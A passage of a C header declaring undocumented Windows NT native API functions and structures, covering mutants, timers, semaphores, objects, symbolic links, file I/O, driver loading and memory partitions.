_In_ HANDLE EventPairHandle);
/************************************************************************************
*
* Mutant API.
*
************************************************************************************/
typedef enum _MUTANT_INFORMATION_CLASS {
MutantBasicInformation,
MutantOwnerInformation
} MUTANT_INFORMATION_CLASS;
typedef struct _MUTANT_BASIC_INFORMATION {
LONG CurrentCount;
BOOLEAN OwnedByCaller;
BOOLEAN AbandonedState;
} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;
typedef struct _MUTANT_OWNER_INFORMATION {
CLIENT_ID ClientId;
} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateMutant(
_Out_ PHANDLE MutantHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ BOOLEAN InitialOwner);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenMutant(
_Out_ PHANDLE MutantHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryMutant(
_In_ HANDLE MutantHandle,
_In_ MUTANT_INFORMATION_CLASS MutantInformationClass,
_Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,
_In_ ULONG MutantInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtReleaseMutant(
_In_ HANDLE MutantHandle,
_Out_opt_ PLONG PreviousCount);
/************************************************************************************
*
* Timer API.
*
************************************************************************************/
typedef VOID(*PTIMER_APC_ROUTINE) (
_In_ PVOID TimerContext,
_In_ ULONG TimerLowValue,
_In_ LONG TimerHighValue
);
typedef enum _TIMER_TYPE {
NotificationTimer,
SynchronizationTimer
} TIMER_TYPE;
typedef enum _TIMER_INFORMATION_CLASS {
TimerBasicInformation
} TIMER_INFORMATION_CLASS;
typedef struct _TIMER_BASIC_INFORMATION {
LARGE_INTEGER RemainingTime;
BOOLEAN TimerState;
} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;
typedef enum _TIMER_SET_INFORMATION_CLASS {
TimerSetCoalescableTimer,
MaxTimerInfoClass
} TIMER_SET_INFORMATION_CLASS;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTimer(
_In_ PHANDLE TimerHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ TIMER_TYPE TimerType);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTimer2(
_Out_ PHANDLE TimerHandle,
_In_opt_ PVOID Reserved1,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG Attributes,
_In_ ACCESS_MASK DesiredAccess);
NTSYSAPI
NTSTATUS
NTAPI
NtSetTimer(
_In_ HANDLE TimerHandle,
_In_ PLARGE_INTEGER DueTime,
_In_opt_ PTIMER_APC_ROUTINE TimerApcRoutine,
_In_opt_ PVOID TimerContext,
_In_ BOOLEAN WakeTimer,
_In_opt_ LONG Period,
_Out_opt_ PBOOLEAN PreviousState);
NTSYSAPI
NTSTATUS
NTAPI
NtSetTimer2(
_In_ HANDLE TimerHandle,
_In_ PLARGE_INTEGER DueTime,
_In_opt_ PLARGE_INTEGER Period,
_In_ PVOID Parameters);
NTSYSAPI
NTSTATUS
NTAPI
NtSetTimerEx(
_In_ HANDLE TimerHandle,
_In_ TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,
_Inout_updates_bytes_opt_(TimerSetInformationLength) PVOID TimerSetInformation,
_In_ ULONG TimerSetInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenTimer(
_In_ PHANDLE TimerHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryTimer(
_In_ HANDLE TimerHandle,
_In_ TIMER_INFORMATION_CLASS TimerInformationClass,
_Out_writes_bytes_(TimerInformationLength) PVOID TimerInformation,
_In_ ULONG TimerInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtCancelTimer(
_In_ HANDLE TimerHandle,
_Out_opt_ PBOOLEAN CurrentState);
NTSYSAPI
NTSTATUS
NTAPI
NtCancelTimer2(
_In_ HANDLE TimerHandle,
_In_ PVOID Parameters);
//ref from ph2
NTSYSAPI
NTSTATUS
NTAPI
NtCreateIRTimer(
_Out_ PHANDLE TimerHandle,
_In_ ACCESS_MASK DesiredAccess);
NTSYSAPI
NTSTATUS
NTAPI
NtSetIRTimer(
_In_ HANDLE TimerHandle,
_In_opt_ PLARGE_INTEGER DueTime);
/************************************************************************************
*
* Semaphore API.
*
************************************************************************************/
typedef enum _SEMAPHORE_INFORMATION_CLASS {
SemaphoreBasicInformation
} SEMAPHORE_INFORMATION_CLASS;
typedef struct _SEMAPHORE_BASIC_INFORMATION {
LONG CurrentCount;
LONG MaximumCount;
} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateSemaphore(
_Out_ PHANDLE SemaphoreHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ LONG InitialCount,
_In_ LONG MaximumCount);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenSemaphore(
_Out_ PHANDLE SemaphoreHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySemaphore(
_In_ HANDLE SemaphoreHandle,
_In_ SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
_Out_writes_bytes_(SemaphoreInformationLength) PVOID SemaphoreInformation,
_In_ ULONG SemaphoreInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtReleaseSemaphore(
_In_ HANDLE SemaphoreHandle,
_In_ LONG ReleaseCount,
_Out_opt_ PLONG PreviousCount);
/************************************************************************************
*
* Object and Handle API.
*
************************************************************************************/
typedef enum _OBJECT_INFORMATION_CLASS {
ObjectBasicInformation,
ObjectNameInformation,
ObjectTypeInformation,
ObjectTypesInformation,
ObjectHandleFlagInformation,
ObjectSessionInformation,
ObjectSessionObjectInformation,
ObjectSetRefTraceInformation,
MaxObjectInfoClass
} OBJECT_INFORMATION_CLASS;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
typedef struct _OBJECT_BASIC_INFORMATION {
ULONG Attributes;
ACCESS_MASK GrantedAccess;
ULONG HandleCount;
ULONG PointerCount;
ULONG PagedPoolCharge;
ULONG NonPagedPoolCharge;
ULONG Reserved[3];
ULONG NameInfoSize;
ULONG TypeInfoSize;
ULONG SecurityDescriptorSize;
LARGE_INTEGER CreationTime;
} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
typedef struct _OBJECT_NAME_INFORMATION {
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;
typedef struct _OBJECT_TYPE_INFORMATION {
UNICODE_STRING TypeName;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
ULONG PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;
typedef struct _OBJECT_TYPE_INFORMATION_V2 {
UNICODE_STRING TypeName;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
UCHAR TypeIndex;
CHAR ReservedByte;
ULONG PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION_V2, *POBJECT_TYPE_INFORMATION_V2;
typedef struct _OBJECT_TYPES_INFORMATION {
ULONG NumberOfTypes;
} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;
#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\
RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))
#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\
RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \
ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))
typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
BOOLEAN Inherit;
BOOLEAN ProtectFromClose;
} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtClose(
_In_ _Post_ptr_invalid_ HANDLE Handle);
NTSYSAPI
NTSTATUS
NTAPI
NtDuplicateObject(
_In_ HANDLE SourceProcessHandle,
_In_ HANDLE SourceHandle,
_In_opt_ HANDLE TargetProcessHandle,
_Out_ PHANDLE TargetHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ ULONG HandleAttributes,
_In_ ULONG Options);
NTSYSAPI
NTSTATUS
NTAPI
NtMakePermanentObject(
_In_ HANDLE Handle);
NTSYSAPI
NTSTATUS
NTAPI
NtMakeTemporaryObject(
_In_ HANDLE Handle);
NTSYSAPI
NTSTATUS
NTAPI
NtSetSecurityObject(
_In_ HANDLE Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor);
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySecurityObject(
_In_ HANDLE Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ ULONG Length,
_Out_ PULONG LengthNeeded);
NTSYSAPI
NTSTATUS
NTAPI
NtCompareObjects(
_In_ HANDLE FirstObjectHandle,
_In_ HANDLE SecondObjectHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryObject(
_In_opt_ HANDLE Handle,
_In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
_Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation,
_In_ ULONG ObjectInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationObject(
_In_ HANDLE Handle,
_In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,
_In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation,
_In_ ULONG ObjectInformationLength);
typedef enum _WAIT_TYPE {
WaitAll,
WaitAny,
WaitNotification
} WAIT_TYPE;
NTSYSAPI
NTSTATUS
NTAPI
NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout);
NTSYSAPI
NTSTATUS
NTAPI
NtWaitForMultipleObjects(
_In_ ULONG Count,
_In_reads_(Count) HANDLE Handles[],
_In_ WAIT_TYPE WaitType,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout);
/************************************************************************************
*
* Time.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySystemTime(
_Out_ PLARGE_INTEGER SystemTime);
NTSYSAPI
NTSTATUS
NTAPI
NtSetSystemTime(
_In_opt_ PLARGE_INTEGER SystemTime,
_Out_opt_ PLARGE_INTEGER PreviousTime);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryTimerResolution(
_Out_ PULONG MaximumTime,
_Out_ PULONG MinimumTime,
_Out_ PULONG CurrentTime);
NTSYSAPI
NTSTATUS
NTAPI
NtSetTimerResolution(
_In_ ULONG DesiredTime,
_In_ BOOLEAN SetResolution,
_Out_ PULONG ActualTime);
/************************************************************************************
*
* Directory Object API.
*
************************************************************************************/
#define OBJDIR_FLAG_SHADOW_PRESENT 0x4
#define OBJDIR_FLAG_SANDBOX 0x10
NTSYSAPI
NTSTATUS
NTAPI
NtCreateDirectoryObject(
_Out_ PHANDLE DirectoryHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateDirectoryObjectEx(
_Out_ PHANDLE DirectoryHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ShadowDirectoryHandle,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenDirectoryObject(
_Out_ PHANDLE DirectoryHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryObject(
_In_ HANDLE DirectoryHandle,
_Out_writes_bytes_opt_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_ BOOLEAN ReturnSingleEntry,
_In_ BOOLEAN RestartScan,
_Inout_ PULONG Context,
_Out_opt_ PULONG ReturnLength);
/************************************************************************************
*
* Private Namespace API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePrivateNamespace(
_Out_ PHANDLE NamespaceHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ PVOID BoundaryDescriptor);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenPrivateNamespace(
_Out_ PHANDLE NamespaceHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ PVOID BoundaryDescriptor);
NTSYSAPI
NTSTATUS
NTAPI
NtDeletePrivateNamespace(
_In_ HANDLE NamespaceHandle);
/************************************************************************************
*
* Symbolic Link API.
*
************************************************************************************/
typedef enum _SYMBOLIC_LINK_INFO_CLASS {
SymbolicLinkGlobalInformation = 1,
SymbolicLinkAccessMask,
MaxnSymbolicLinkInfoClass
} SYMBOLIC_LINK_INFO_CLASS;
typedef struct _OBJECT_SYMBOLIC_LINK_V1 { //pre Win10 TH1
LARGE_INTEGER CreationTime;
UNICODE_STRING LinkTarget;
ULONG DosDeviceDriveIndex;
} OBJECT_SYMBOLIC_LINK_V1, *POBJECT_SYMBOLIC_LINK_V1;
typedef struct _OBJECT_SYMBOLIC_LINK_V2 { //Win10 TH1/TH2
LARGE_INTEGER CreationTime;
UNICODE_STRING LinkTarget;
ULONG DosDeviceDriveIndex;
ULONG Flags;
} OBJECT_SYMBOLIC_LINK_V2, *POBJECT_SYMBOLIC_LINK_V2;
typedef struct _OBJECT_SYMBOLIC_LINK_V3 { //Win10 RS1
LARGE_INTEGER CreationTime;
UNICODE_STRING LinkTarget;
ULONG DosDeviceDriveIndex;
ULONG Flags;
ULONG AccessMask;
} OBJECT_SYMBOLIC_LINK_V3, *POBJECT_SYMBOLIC_LINK_V3;
typedef struct _OBJECT_SYMBOLIC_LINK_V4 { //Win10 RS2+
LARGE_INTEGER CreationTime;
union {
UNICODE_STRING LinkTarget;
struct {
PVOID Callback;
PVOID CallbackContext;
};
} u1;
ULONG DosDeviceDriveIndex;
ULONG Flags;
ULONG AccessMask;
//long __PADDING__[1];
} OBJECT_SYMBOLIC_LINK_V4, *POBJECT_SYMBOLIC_LINK_V4; /* size: 0x0028 */
typedef struct _OBJECT_SYMBOLIC_LINK_V5 { //Win10 21H1+
LARGE_INTEGER CreationTime;
union {
UNICODE_STRING LinkTarget;
struct {
PVOID Callback;
PVOID CallbackContext;
};
} u1;
ULONG DosDeviceDriveIndex;
ULONG Flags;
ULONG AccessMask;
ULONG IntegrityLevel;
} OBJECT_SYMBOLIC_LINK_V5, * POBJECT_SYMBOLIC_LINK_V5; /* size: 0x0028 */
NTSYSAPI
NTSTATUS
NTAPI
NtCreateSymbolicLinkObject(
_Out_ PHANDLE LinkHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ PUNICODE_STRING LinkTarget);
NTSYSAPI
NTSTATUS
WINAPI
NtOpenSymbolicLinkObject(
_Out_ PHANDLE LinkHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySymbolicLinkObject(
_In_ HANDLE LinkHandle,
_Inout_ PUNICODE_STRING LinkTarget,
_Out_opt_ PULONG ReturnedLength);
NTSTATUS
NTAPI
NtSetInformationSymbolicLink(
_In_ HANDLE LinkHandle,
_In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass,
_In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation,
_In_ ULONG SymbolicLinkInformationLength);
/************************************************************************************
*
* File API (+Driver&HotPatch).
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtCreateFile(
_Out_ PHANDLE FileHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_opt_ PLARGE_INTEGER AllocationSize,
_In_ ULONG FileAttributes,
_In_ ULONG ShareAccess,
_In_ ULONG CreateDisposition,
_In_ ULONG CreateOptions,
_In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
_In_ ULONG EaLength);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateNamedPipeFile(
_Out_ PHANDLE FileHandle,
_In_ ULONG DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG ShareAccess,
_In_ ULONG CreateDisposition,
_In_ ULONG CreateOptions,
_In_ ULONG NamedPipeType,
_In_ ULONG ReadMode,
_In_ ULONG CompletionMode,
_In_ ULONG MaximumInstances,
_In_ ULONG InboundQuota,
_In_ ULONG OutboundQuota,
_In_opt_ PLARGE_INTEGER DefaultTimeout);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateMailslotFile(
_Out_ PHANDLE FileHandle,
_In_ ULONG DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG CreateOptions,
_In_ ULONG MailslotQuota,
_In_ ULONG MaximumMessageSize,
_In_ PLARGE_INTEGER ReadTimeout);
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG IoControlCode,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_In_ ULONG OutputBufferLength);
NTSYSAPI
NTSTATUS
NTAPI
NtFsControlFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG FsControlCode,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_In_ ULONG OutputBufferLength);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenFile(
_Out_ PHANDLE FileHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG ShareAccess,
_In_ ULONG OpenOptions);
NTSYSAPI
NTSTATUS
NTAPI
NtReadFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_opt_ PLARGE_INTEGER ByteOffset,
_In_opt_ PULONG Key);
NTSYSAPI
NTSTATUS
NTAPI
NtWriteFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_reads_bytes_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_opt_ PLARGE_INTEGER ByteOffset,
_In_opt_ PULONG Key);
NTSYSAPI
NTSTATUS
NTAPI
NtLockFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PLARGE_INTEGER ByteOffset,
_In_ PLARGE_INTEGER Length,
_In_ ULONG Key,
_In_ BOOLEAN FailImmediately,
_In_ BOOLEAN ExclusiveLock);
NTSYSAPI
NTSTATUS
NTAPI
NtUnlockFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PLARGE_INTEGER ByteOffset,
_In_ PLARGE_INTEGER Length,
_In_ ULONG Key);
NTSYSAPI
NTSTATUS
NTAPI
NtFlushBuffersFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass);
NTSYSAPI
NTSTATUS
NTAPI
NtDeleteFile(
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryFullAttributesFile(
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ BOOLEAN ReturnSingleEntry,
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryFileEx(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ ULONG QueryFlags,
_In_opt_ PUNICODE_STRING FileName);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryEaFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_ BOOLEAN ReturnSingleEntry,
_In_reads_bytes_opt_(EaListLength) PVOID EaList,
_In_ ULONG EaListLength,
_In_opt_ PULONG EaIndex,
_In_ BOOLEAN RestartScan);
NTSYSAPI
NTSTATUS
NTAPI
NtSetEaFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_bytecount_(Length) PVOID Buffer,
_In_ ULONG Length);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryVolumeInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID FsInformation,
_In_ ULONG Length,
_In_ FS_INFORMATION_CLASS FsInformationClass);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryQuotaInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_ BOOLEAN ReturnSingleEntry,
_In_reads_bytes_opt_(SidListLength) PVOID SidList,
_In_ ULONG SidListLength,
_In_opt_ PSID StartSid,
_In_ BOOLEAN RestartScan);
NTSYSAPI
NTSTATUS
NTAPI
NtSetQuotaInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_reads_bytes_(Length) PVOID Buffer,
_In_ ULONG Length);
NTSYSAPI
NTSTATUS
NTAPI
NtReadFileScatter(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PFILE_SEGMENT_ELEMENT SegmentArray,
_In_ ULONG Length,
_In_opt_ PLARGE_INTEGER ByteOffset,
_In_opt_ PULONG Key);
NTSYSAPI
NTSTATUS
NTAPI
NtWriteFileGather(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ PFILE_SEGMENT_ELEMENT SegmentArray,
_In_ ULONG Length,
_In_opt_ PLARGE_INTEGER ByteOffset,
_In_opt_ PULONG Key);
NTSYSAPI
NTSTATUS
NTAPI
NtNotifyChangeDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_writes_bytes_(Length) PVOID Buffer,
_In_ ULONG Length,
_In_ ULONG CompletionFilter,
_In_ BOOLEAN WatchTree);
NTSYSAPI
NTSTATUS
NTAPI
NtCopyFileChunk(
_In_ HANDLE SourceHandle,
_In_ HANDLE DestinationHandle,
_In_opt_ HANDLE EventHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG Length,
_In_ PLARGE_INTEGER SourceOffset,
_In_ PLARGE_INTEGER DestOffset,
_In_opt_ PULONG SourceKey,
_In_opt_ PULONG DestKey,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadDriver(
_In_ PUNICODE_STRING DriverServiceName);
NTSYSAPI
NTSTATUS
NTAPI
NtUnloadDriver(
_In_ PUNICODE_STRING DriverServiceName);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadHotPatch(
_In_ PUNICODE_STRING HotPatchName,
_Reserved_ ULONG LoadFlag);
NTSYSAPI
NTSTATUS
NTAPI
NtManageHotPatch(
_In_ ULONG HotPatchInformationClass,
_Out_writes_bytes_opt_(HotPatchInformationLength) PVOID HotPatchInformation,
_In_ ULONG HotPatchInformationLength,
_Out_opt_ PULONG ReturnLength);
/************************************************************************************
*
* Section API (+MemoryPartitions).
*
************************************************************************************/
#define MEM_EXECUTE_OPTION_ENABLE 0x1
#define MEM_EXECUTE_OPTION_DISABLE 0x2
#define MEM_EXECUTE_OPTION_DISABLE_THUNK_EMULATION 0x4
#define MEM_EXECUTE_OPTION_PERMANENT 0x8
#define MEM_EXECUTE_OPTION_EXECUTE_DISPATCH_ENABLE 0x10
#define MEM_EXECUTE_OPTION_IMAGE_DISPATCH_ENABLE 0x20
#define MEM_EXECUTE_OPTION_VALID_FLAGS 0x3f
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionInformation,
SystemMemoryPartitionMoveMemory,
SystemMemoryPartitionAddPagefile,
SystemMemoryPartitionCombineMemory,
SystemMemoryPartitionInitialAddMemory,
SystemMemoryPartitionGetMemoryEvents,
SystemMemoryPartitionSetAttributes,
SystemMemoryPartitionNodeInformation,
SystemMemoryPartitionCreateLargePages,
SystemMemoryPartitionDedicatedMemoryInformation,
SystemMemoryPartitionOpenDedicatedMemory,
SystemMemoryPartitionMemoryChargeAttributes,
